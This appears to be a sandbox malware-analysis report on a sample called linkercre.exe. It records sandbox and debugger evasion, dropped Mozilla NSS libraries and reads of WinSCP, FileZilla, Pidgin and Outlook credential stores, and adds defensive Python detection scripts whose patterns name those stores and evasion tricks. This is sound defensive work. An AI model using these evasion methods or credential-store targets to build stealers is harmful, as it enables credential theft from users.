Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\nssdbm3.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\nss3.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\vcruntime140.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\ucrtbase.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | File created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-localization-l1-2-0.dll
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\linkercre.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe (2 occurrences)
Source: C:\Users\user\Desktop\linkercre.exe | File opened: C:\Program Files\qga\qga.exe (2 occurrences)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: linkercre.exe, 00000000.00000002.371329640.0000000002B40000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43AD6 rdtsc 0_2_02B43AD6
Source: C:\Users\user\Desktop\linkercre.exe | Window / User API: threadDelayed 1119
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\softokn3.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\nssdbm3.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\freebl3.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\linkercre.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\linkercre.exe, TID: 4880 | Thread sleep count: 1119 > 30
Source: C:\Users\user\Desktop\linkercre.exe | Thread sleep count: Count: 1119 delay: -5
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: vmicvss
Source: linkercre.exe, 00000000.00000002.371329640.0000000002B40000.00000040.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat

Anti Debugging:

Contains functionality to hide a thread from the debugger (ThreadInformationClass 0x11 = ThreadHideFromDebugger)
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43AD6 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00400000,00000000,00000000 0_2_02B43AD6
Hides threads from debuggers
Source: C:\Users\user\Desktop\linkercre.exe | Thread information set: HideFromDebugger (3 occurrences)
Source: C:\Users\user\Desktop\linkercre.exe | Process queried: DebugPort (2 occurrences)
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43AD6 rdtsc 0_2_02B43AD6
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B41CAF LdrInitializeThunk 0_2_02B41CAF
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B42EAD mov eax, dword ptr fs:[00000030h] 0_2_02B42EAD (fs:[30h] is the PEB on 32-bit Windows; the same read appears in the functions below)
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43481 mov eax, dword ptr fs:[00000030h] 0_2_02B43481
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4340B mov eax, dword ptr fs:[00000030h] 0_2_02B4340B
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B40C6F mov eax, dword ptr fs:[00000030h] 0_2_02B40C6F
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B433E3 mov eax, dword ptr fs:[00000030h] 0_2_02B433E3
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B42BDC mov eax, dword ptr fs:[00000030h] 0_2_02B42BDC
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B41921 mov eax, dword ptr fs:[00000030h] 0_2_02B41921
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4115E mov eax, dword ptr fs:[00000030h] 0_2_02B4115E
Source: C:\Users\user\Desktop\linkercre.exe | Process created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe'
Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4289A cpuid 0_2_02B4289A
Source: C:\Users\user\Desktop\linkercre.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\linkercre.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
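Taken one at a time, the rows in the evasion and anti-debugging sections are weak signals: a sleep loop, a PEB read or a cpuid occurs in plenty of legitimate code. They become convincing only when tallied together per process and mapped to techniques. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It expects rows in the form "Source: <process> | <event>", applies a small rule table and returns a per-process tally plus the ATT&CK IDs it implies. The rule table, the labels and the sleep-count threshold (the report's own "> 30") are the author's choices; TRACE is constructed from events in this report plus one benign control row with a short sleep count.

```python
"""Tally anti-analysis techniques from sandbox behaviour rows.

Added example for this report, not Joe Sandbox code. Rows are expected as
"Source: <process> | <event>"; RULES, the labels and the ATT&CK mapping are
the author's own choices, and TRACE is constructed from events in the report.
"""
import re
from collections import Counter

SLEEP_LOOP_THRESHOLD = 30  # same cut-off the report applies ("1119 > 30")

# (label, ATT&CK id, pattern over the event text)
RULES = [
    ("vm_guest_agent_probe", "T1497.001",
     re.compile(r"File opened: .*\\(qemu-ga|qga)\.exe", re.I)),
    ("hyperv_service_strings", "T1497.001",
     re.compile(r"memory string: (vmic\w+|Hyper-V )", re.I)),
    ("sleep_loop_stalling", "T1497.003",
     re.compile(r"Thread sleep count: (?:Count: )?(\d+)")),
    ("installed_software_enum", "T1518.001",
     re.compile(r"Registry key enumerated: .*\\Uninstall", re.I)),
    ("hide_thread_from_debugger", "T1622",
     re.compile(r"Thread information set: HideFromDebugger"
                r"|NtSetInformationThread \w+,00000011")),
    ("debug_port_query", "T1622", re.compile(r"Process queried: DebugPort")),
    ("rdtsc_timing", "T1622", re.compile(r"\brdtsc\b")),
    ("peb_read", "T1622", re.compile(r"fs:\[00000030h\]")),
    ("cpuid_query", "T1082", re.compile(r"\bcpuid\b|CentralProcessor\\0")),
]
ATTACK_ID = {label: tid for label, tid, _ in RULES}


def parse_row(row):
    """Split a row into (process basename, event text); None for headings."""
    m = re.match(r"\s*Source:\s*(.*?)\s*\|\s*(.*\S)\s*$", row)
    if not m:
        return None
    # "C:\...\linkercre.exe" and "linkercre.exe, <dump id>" both become linkercre.exe
    proc = m.group(1).split(",")[0].rsplit("\\", 1)[-1].lower()
    return proc, m.group(2)


def classify(event):
    """Labels triggered by one event; sleep loops count only above the threshold."""
    hits = []
    for label, _, rx in RULES:
        m = rx.search(event)
        if m is None:
            continue
        if label == "sleep_loop_stalling" and int(m.group(1)) <= SLEEP_LOOP_THRESHOLD:
            continue
        hits.append(label)
    return hits


def summarize(rows):
    """{process: Counter(label -> occurrences)} over all parseable rows."""
    per_proc = {}
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        proc, event = parsed
        tally = per_proc.setdefault(proc, Counter())
        for label in classify(event):
            tally[label] += 1
    return per_proc


def attack_ids(summary):
    """Distinct ATT&CK ids seen, for cross-checking the report's technique matrix."""
    return {ATTACK_ID[label] for tally in summary.values() for label in tally}


# Constructed from rows in this report; the "Count: 3" row is a benign control.
TRACE = [
    r"Source: C:\Users\user\Desktop\linkercre.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe",
    r"Source: C:\Users\user\Desktop\linkercre.exe | File opened: C:\Program Files\qga\qga.exe",
    r"Source: linkercre.exe, 00000000.00000002.378977872.000000000474A000.00000004.00000001.sdmp"
    r" | Binary or memory string: vmicheartbeat",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Thread sleep count: Count: 1119 delay: -5",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Thread sleep count: Count: 3 delay: -5",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Registry key enumerated: More than 149 enums for key"
    r" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B43AD6 rdtsc 0_2_02B43AD6",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B42EAD mov eax, dword ptr fs:[00000030h] 0_2_02B42EAD",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Code function: 0_2_02B4289A cpuid 0_2_02B4289A",
    r"Source: C:\Users\user\Desktop\linkercre.exe | Process information set: NOOPENFILEERRORBOX",
    "Tries to detect Any.run",
]

if __name__ == "__main__":
    summary = summarize(TRACE)
    for proc, tally in summary.items():
        print(proc, dict(tally))
    print(sorted(attack_ids(summary)))
```

The threshold matters: a handful of short sleeps is normal, so only a count above the report's cut-off is labelled. The two QEMU guest-agent paths are reported under the signature "Tries to detect Any.run" because that service installs qemu-ga on its guests; the same probe fires on any QEMU/KVM-based sandbox, so the rule label is deliberately generic.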

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\linkercre.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\linkercre.exe | File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\linkercre.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml (2 occurrences)
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\linkercre.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
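Two findings in this report belong together: the Mozilla NSS libraries (nss3.dll, softokn3.dll, freebl3.dll, nssdbm3.dll) dropped into a %TEMP% subfolder next to msvcp140.dll and vcruntime140.dll but never loaded, and the reads of the WinSCP, FileZilla, Pidgin and Outlook credential stores. NSS is what a stealer loads to call the Firefox/Thunderbird secret-decryption routines, so the unstarted DLLs are a capability indicator even though nothing used them during the run. The Python below is an added example written for this page, not part of the report and not GuLoader code: it buckets the dropped file names and flags every credential-store read by a process other than the store's own application. The owner allowlist, the verdict rules, DROPPED and ACCESS_EVENTS are assumptions constructed for the example; DROPPED takes file names from the report, and the filezilla.exe row in ACCESS_EVENTS is an invented benign control.

```python
"""Stealer-capability triage: dropped NSS kit plus credential-store reads.

Added example for this report, not Joe Sandbox or GuLoader code. DROPPED takes
file names from the report; ACCESS_EVENTS mirrors the report's "Key opened" /
"File opened" rows plus one constructed benign row. Owner lists and verdict
rules are the author's assumptions.
"""
import re
from pathlib import PureWindowsPath

# Mozilla NSS: a stealer needs these (NSS_Init / PK11SDR_Decrypt) to decrypt
# Firefox- and Thunderbird-family saved logins; benign software rarely drops
# them into a random %TEMP% subfolder.
NSS_LIBS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "nssdbm3.dll"}
# Visual C++ / UCRT runtime the NSS build links against.
VC_RUNTIME = {"msvcp140.dll", "vcruntime140.dll", "ucrtbase.dll"}

# (store label, processes expected to read it, pattern over the path or registry key)
CRED_STORES = [
    ("winscp_sessions", {"winscp.exe"},
     re.compile(r"\\Software\\Martin Prikryl\\WinSCP 2\\Sessions", re.I)),
    ("filezilla_recentservers", {"filezilla.exe"},
     re.compile(r"\\filezilla\\recentservers\.xml$", re.I)),
    ("pidgin_accounts", {"pidgin.exe"},
     re.compile(r"\\\.purple\\accounts\.xml$", re.I)),
    ("outlook_profiles", {"outlook.exe"},
     re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook", re.I)),
]


def classify_dropped(paths):
    """Bucket dropped files: nss, vc_runtime, api_set_stub (api-ms-win-*), other."""
    buckets = {"nss": set(), "vc_runtime": set(), "api_set_stub": set(), "other": set()}
    for p in paths:
        name = PureWindowsPath(p).name.lower()
        if name in NSS_LIBS:
            buckets["nss"].add(name)
        elif name in VC_RUNTIME:
            buckets["vc_runtime"].add(name)
        elif name.startswith("api-ms-win-") and name.endswith(".dll"):
            buckets["api_set_stub"].add(name)
        else:
            buckets["other"].add(name)
    return buckets


def has_nss_stealer_kit(paths):
    """True when the complete NSS set is dropped together with the runtime it needs."""
    b = classify_dropped(paths)
    return NSS_LIBS <= b["nss"] and {"msvcp140.dll", "vcruntime140.dll"} <= b["vc_runtime"]


def credential_access(events):
    """(store, process) for every read of a credential store by a non-owner process."""
    findings = []
    for image, target in events:
        proc = PureWindowsPath(image).name.lower()
        for store, owners, rx in CRED_STORES:
            if rx.search(target) and proc not in owners:
                findings.append((store, proc))
    return findings


def triage(dropped, events):
    """Combine both signals: kit and store reads -> stealer; one of them -> suspicious."""
    kit = has_nss_stealer_kit(dropped)
    stores = sorted({store for store, _ in credential_access(events)})
    if kit and stores:
        verdict = "stealer"
    elif kit or stores:
        verdict = "suspicious"
    else:
        verdict = "none"
    return {"nss_kit": kit, "stores": stores, "verdict": verdict}


# Constructed input: a subset of the report's dropped files and its store accesses.
TEMP_DIR = PureWindowsPath(r"C:\Users\user\AppData\Local\Temp\1269D1DA")
DROPPED = [str(TEMP_DIR / n) for n in (
    "msvcp140.dll", "vcruntime140.dll", "ucrtbase.dll",
    "nss3.dll", "softokn3.dll", "freebl3.dll", "nssdbm3.dll",
    "api-ms-win-core-file-l1-1-0.dll", "api-ms-win-crt-runtime-l1-1-0.dll",
)]
SAMPLE = r"C:\Users\user\Desktop\linkercre.exe"
ACCESS_EVENTS = [
    (SAMPLE, r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"),
    (SAMPLE, r"C:\Users\user\AppData\Roaming\filezilla\recentservers.xml"),
    (SAMPLE, r"C:\Users\user\AppData\Roaming\.purple\accounts.xml"),
    (SAMPLE, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
             r"\Windows Messaging Subsystem\Profiles\Outlook"),
    # constructed control: the owning application reading its own store is not a finding
    (r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     r"C:\Users\user\AppData\Roaming\filezilla\recentservers.xml"),
]

if __name__ == "__main__":
    print(triage(DROPPED, ACCESS_EVENTS))
```

The owner allowlist is the tunable part: backup and profile-migration tools legitimately read these stores, so in production it would be populated from your own telemetry rather than from the four names assumed here. The NSS test is deliberately strict (all four libraries plus the runtime) because a single nss3.dll next to a legitimate NSS consumer is common, while the full set in %TEMP% next to a dropper is not.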

Mitre Att&ck Matrix

Techniques are listed per tactic column as in the report's matrix. A number in parentheses is the count annotation the report attaches to that technique; entries without a number are the matrix's unmarked placeholders.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (11); Obfuscated Files or Information (1); Software Packing (1); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); Credentials in Registry (2); Credentials In Files (1); NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (421); Process Discovery (1); Virtualization/Sandbox Evasion (23); Application Window Discovery (1); Remote System Discovery (1); System Information Discovery (33)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Email Collection (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Non-Application Layer Protocol (2); Application Layer Protocol (12); Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Behavior Graph

[The behavior graph image is not reproduced in this text extract. Its legend distinguishes process, signature, created-file and DNS/IP nodes, marks dropped files, Windows processes, the number of created registry values and files, the implementation language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious nodes and Internet access.]